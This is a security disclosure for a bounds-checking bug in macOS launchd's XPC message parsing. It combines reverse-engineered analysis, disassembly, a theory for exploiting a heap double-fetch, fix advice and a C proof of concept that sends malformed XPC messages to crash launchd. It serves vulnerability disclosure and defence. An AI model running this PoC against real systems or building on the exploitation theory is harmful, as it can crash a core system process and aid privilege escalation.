// ianbeer
#if 0
Memory corruption in launchd due to lack of bounds checking parsing XPC message

Launchd is one of the most privileged processes on MacOS/iOS. It's pid 1, and reponsible for orchestrating
named IPC, amongst other things.

Launchd used to be an open-source project but starting with MacOS 10.10 in 2014 there was a major rewrite
and the source stopped being released on opensource.apple.com. This rewrite added support for communicating
with launchd using XPC messages, in addition to the legacy MIG messages.

Launchd is stripped so this writeup will use function addresses from the 10.15.1 MacOS launchd build.

XPC messages sent to launchd over the bootstrap xpc pipe use "subsystem" and "routine" uint64's to
define which IPC method to invoke.

The subsystems are registered dynamically, there are at least subsystems 2,3,4,5,6,7,8. Each registered
subsystem has a function pointer, called when a message with the corrisponding "subsystem" value is received.

The second argument to the subsystem handler function is the "routine" value, and the third argument is the
received XPC message dictionary object.

sub_100020059 is the handler function for subsystem 3. It's an enormous switch statement handling each routine
value supported by subsystem 3. Let's look at routine 817:

It reads two values from the message:

  case 817:
    ...
    v205 = xpc_dictionary_get_string(xpc_dict, "label");
    ...
    data_buf_len = 0LL;
    data_buf = xpc_dictionary_get_data(xpc_dict, "attr", &data_buf_len);
    ...

The data_buf and data_buf_len values are passed, without extra checks apart from NULL, to sub_100001873 as the second and third arguments:

    sub_100001873((__int64)v19, also_data_buf, data_buf_len, v105, &v406, (__int64)poly, (int)v403, &tn)

sub_100001873 immediately passes the data_buf and data_len values to xpc_spawnattr_unpack_string:

  _xpc_spawnattr_unpack_string(data_buf, data_buf_size, data_buf[1]);

(I've cast data_buf to a uint32_t* in this decompiler output; that's reading a 4 byte value from offset +4 in the xpc_data buffer.)

There's already a problem here; nothing has checked that data_buf_len is at least 8 so data_buf[1] could be reading out-of-bounds. Small xpc_data
objects would be represented in the receiver as os_dispatch_alloc buffers, which are just malloc'ed buffers with a small header and the data at the end.

Here's xpc_spawnattr_unpack_string:

const char *__fastcall _xpc_spawnattr_unpack_string(char *data_buf, unsigned __int64 data_buf_size, unsigned int controlled_u32)
{
  const char *v3; // r14
  unsigned __int64 v4; // rcx
  const char *result; // rax

  if ( controlled_u32 >= data_buf_size )
    return 0LL;
  v3 = &data_buf[controlled_u32 + 0xAE];
  v4 = controlled_u32 + strlen(v3) + 1;
  result = 0LL;
  if ( v4 <= data_buf_size )
    result = v3;
  return result;
}

The third argument is a controlled_u32 (though potentially read out of bounds already.) Note that there is an attempt to perform
a bounds check here:

  if ( controlled_u32 >= data_buf_size )
    ...

but then right after 0xAE is added to that size value:

  v3 = &data_buf[controlled_u32 + 0xAE];
  v4 = controlled_u32 + strlen(v3) + 1;

v3 could now also be out-of-bounds, and it's then passed to strlen. There's no guarantee that an xpc_data buffer is NULL terminated
(unlike xpc_strings.) This POC will trigger a launchd crash here trying to strlen out-of-bounds.

Of course, this doesn't have much interesting security impact. But it's at least easy to repro.

If you keep reading the code though there's a more iteresting bug which does look exploitable and would have security impact.

Actually triggering it would require a fair amount of heap grooming, but I'll outline a theory at least for how to do it.

Note that launchd used to support running with libgmalloc, but this features seems to be gone, at least from production
builds of launchd. (It was used in a jailbreak persistence chain at one point...)

Let's go back to sub_100001873:

  v14 = data_buf[4];
  v15 = a4;
  if ( data_buf[4] )
  {
    v16 = launchd_malloc(8 * v14);
    if ( !v16 )
      goto LABEL_31;
    v17 = v16;
    if ( !_xpc_spawnattr_unpack_strings((__int64)data_buf, data_buf_size, data_buf[5], (__int64)v16, data_buf[4]) )

Here's the assembly for that decompiled snippet; it's important to read the disassembly here because the decompiler
sometimes takes liberties with memory dereferences:

__text:0000000100001913                 mov     rax, [rbp+var_190]
__text:000000010000191A                 mov     edi, [rax+10h]          ; <-- load (1)
__text:000000010000191D                 test    rdi, rdi
__text:0000000100001920                 mov     rsi, r14
__text:0000000100001923                 mov     [rbp+var_198], r14
__text:000000010000192A                 jz      loc_1000019E9
__text:0000000100001930                 shl     rdi, 3          ; a1
__text:0000000100001934                 call    launchd_malloc
__text:0000000100001939                 test    rax, rax
__text:000000010000193C                 jz      loc_100001BB8
__text:0000000100001942                 mov     r13, rax
__text:0000000100001945                 mov     r14, [rbp+var_190]
__text:000000010000194C                 mov     r8d, [r14+10h]         ; <-- load (2)
__text:0000000100001950                 mov     edx, [r14+14h]
__text:0000000100001954                 mov     rdi, r14
__text:0000000100001957                 mov     rsi, [rbp+var_188]
__text:000000010000195E                 mov     rcx, rax
__text:0000000100001961                 call    __xpc_spawnattr_unpack_strings

This code reads a u32 from offset +0x10 in the xpc_data buffer:

  v14 = data_buf[4];

That value is passed to a function I've named launchd_malloc, which is a trivial wrapper around malloc.

There's then *another* load from data_buf[4], where the value is passed as the fifth argument to _xpc_spawnattr_unpack_strings.
Looking in the disassembly we can see that there really is another load from the xpc_data buffer here:

__text:0000000100001945                 mov     r14, [rbp+var_190]  ; <-- load the data_buf pointer again
__text:000000010000194C                 mov     r8d, [r14+10h]      ; <-- load the u32 from offset +0x10 again
__text:0000000100001950                 mov     edx, [r14+14h]
__text:0000000100001954                 mov     rdi, r14
__text:0000000100001957                 mov     rsi, [rbp+var_188]
__text:000000010000195E                 mov     rcx, rax
__text:0000000100001961                 call    __xpc_spawnattr_unpack_strings ; <-- r8d is the fifth arg

Here's _xpc_spawnattr_unpack_strings:

char *__fastcall _xpc_spawnattr_unpack_strings(__int64 data_buf,
                                               unsigned __int64 data_buf_size,
                                               unsigned int controlled_u32_at_plus_0x14,
                                               char **malloced_outbuf,
                                               unsigned __int64 controlled_u32_at_plus_0x10)
{
  char *v7; // rbx
  __int64 v8; // r15

  if ( controlled_u32_at_plus_0x14 < data_buf_size )
  {
    if ( !controlled_u32_at_plus_0x10 )
      return *malloced_outbuf;
    v7 = (char *)(data_buf + controlled_u32_at_plus_0x14 + 0xAE);
    v8 = 0LL;
    while ( 1 )
    {
      malloced_outbuf[v8] = v7;
      v7 += strlen(v7) + 1;
      if ( (unsigned __int64)v7 > data_buf + data_buf_size + 0xAE )
        break;
      if ( ++v8 >= controlled_u32_at_plus_0x10 )
        return *malloced_outbuf;
    }
  }
  return 0LL;
}

The important part here is that the fifth argument is used to represent the number of pointer-sized elements which can fit in the malloced_outbuf
buffer. The code then fills that buffer in with string pointers.

The bug here is that that double-fetch can be out-of-bounds because nothing verifies that the xpc_data backing buffer is at least 0x14 bytes.
If that value can be made to be larger the second time it's read then there's heap corruption here. But is that possible? There's very little
which happens inbetween...

Let's imagine that the xpc_data object we send has length 0x10.
The backing buffer for a small, deserialized xpc_data object is a dispatch_data object, which prepends a 0x40 byte header
so the 0x10 byte xpc_data buffer is actually the last 0x10 bytes of a 0x50 byte calloc allocation.

The default heap uses a 0x10 byte quantum, so accessing the dword at +0x14 (+0x54 from the start of the actual malloc)
will read the first dword off of the end, in to the next allocation or free memory.

Let's look at the code again:

sub_100001873:

  v14 = data_buf[4];        // <--- first read
  v15 = a4;
  if ( data_buf[4] )
  {
    v16 = launchd_malloc(8 * v14); // <--- use
    if ( !v16 )
      goto LABEL_31;
    v17 = v16;
    if ( !_xpc_spawnattr_unpack_strings((__int64)data_buf, data_buf_size, data_buf[5], (__int64)v16, data_buf[4]) ) // <--- second read


The only thing which happens inbetween the first and second read is a malloc; so we need a side-effect of this malloc to be increasing the
dword read off-the-end of data_buf :)

The first two qwords of free'd allocations in the TINY zone are the prev and next freelist pointers for the size-class's freelist.

If the heap can be groomed such that the xpc_data buffer lands just in front of a free allocation which is at the head of a freelist,
the the dword read out-of-bounds the first time will be 0, as the free allocation at the head of a freelist has a NULL prev pointer.
malloc(0) is equivilent to malloc(0x10), and returns a valid pointer.

In order to change that prev pointer as a side-effect of the malloc it would then be required for the 0x10 freelist to be empty such that
a larger free allocation has to be split up to satisfy the 0x10 request. The leftover size then has to be equal to the size of the free allocation
following the xpc_data buffer, such that it will get enqueued on to the head of that size class's freelist. This would overwrite the prev pointer with
the (obfuscated) pointer to this new chunk, making that value non-zero, thus satisfying the requirement that we cause the OOB-read value read
the second time to be larger than the first time. It doesn't matter how much larger as the loop in _xpc_spawnattr_unpack_strings can be escaped
in other ways.

Actually doing this is left as an exercise for the reader ;)

How to fix this:

 * Verify the length of the xpc_data buffer.
 * Don't assume strings inside an xpc_data buffer are NULL-terminated; you can use strnlen and some pointer maths for this.
     Better still, refactor the code to serialize the spawn arguments to also use XPC data structures like xpc_string rather than this custom
     format.

Variant analysis/fuzzing tips:

 * I'm pretty surprised there are still bugs like this in launchd; this is very critical attack surface and with a source code audit these
     issues should fall out pretty quickly. (This particular routine can be sandboxed off to some clients; but it's still a privilege boundary)
 * A MITM'ing XPC-aware mach message fuzzer could have found this (by reducing the size of the xpc_data to 1 byte while in transit.) But it would
     require either an ASAN build, or at least libgmalloc. libgmalloc support seems to have been removed from at least the release build of launchd,
     is it still there for debug?

#endif

#include <stdio.h>
#include <stdlib.h>

#include <mach/mach.h>
#include <sys/types.h>
#include <launch.h>
#include <unistd.h>
#include <paths.h>
#include <uuid/uuid.h>

#include <xpc/xpc.h>


// see https://github.com/bazad/blanket/blob/master/blanket_payload/bootstrap_port.c 
// for an explanation of this:
xpc_object_t get_bootstrap_pipe() {
  struct _os_alloc_once_s {
    long once;
    void *ptr;
  };

  extern struct _os_alloc_once_s _os_alloc_once_table[];

  struct xpc_global_data {
    uint64_t a;
    uint64_t xpc_flags;
    mach_port_t task_bootstrap_port;
    xpc_object_t xpc_bootstrap_pipe;
  };

  struct xpc_global_data *xpc_global_data = _os_alloc_once_table[1].ptr;

  return xpc_global_data->xpc_bootstrap_pipe;
}

extern int xpc_pipe_routine(xpc_object_t xpc_pipe_obj, xpc_object_t dict, xpc_object_t* reply);

void* build_data(int len) {
  uint32_t* buf = malloc(len);
  memset(buf, '/', len);
  buf[1] = 0x10;
  return buf;
}

void manual_spawn(int len) {
  xpc_object_t dict = xpc_dictionary_create(0, 0, 0);

  void* data = build_data(len);
  xpc_dictionary_set_data(dict, "attr", data, len);
  free(data);

  xpc_dictionary_set_uint64(dict, "handle", 0);
  xpc_dictionary_set_uint64(dict, "type", 7);
  xpc_dictionary_set_string(dict, "label", "label");

  // generic launchd stuff:
  xpc_dictionary_set_uint64(dict, "subsystem", 3);
  xpc_dictionary_set_uint64(dict, "routine", 817);

  xpc_object_t reply = 0;

  int err = xpc_pipe_routine(get_bootstrap_pipe(), dict, &reply);

  xpc_release(dict);
  if (reply) {
    xpc_release(reply);
  }
  
  if (err) {
    printf("pipe routine failed?\n");
  } else {
    printf("pipe routine success! %d\n", len);
  }
}

int main() {
  // this just tries to crash with the bad strlen, but the more interesting bug is just after that in the code
  // it isn't sufficient for a fix to just stop this crash, please ensure that the rest of this report has been
  // read and comprehended.
  for (int i = 0x4000; i < 0x100000; i++) {
    manual_spawn(i);
  }

  return 0;
}
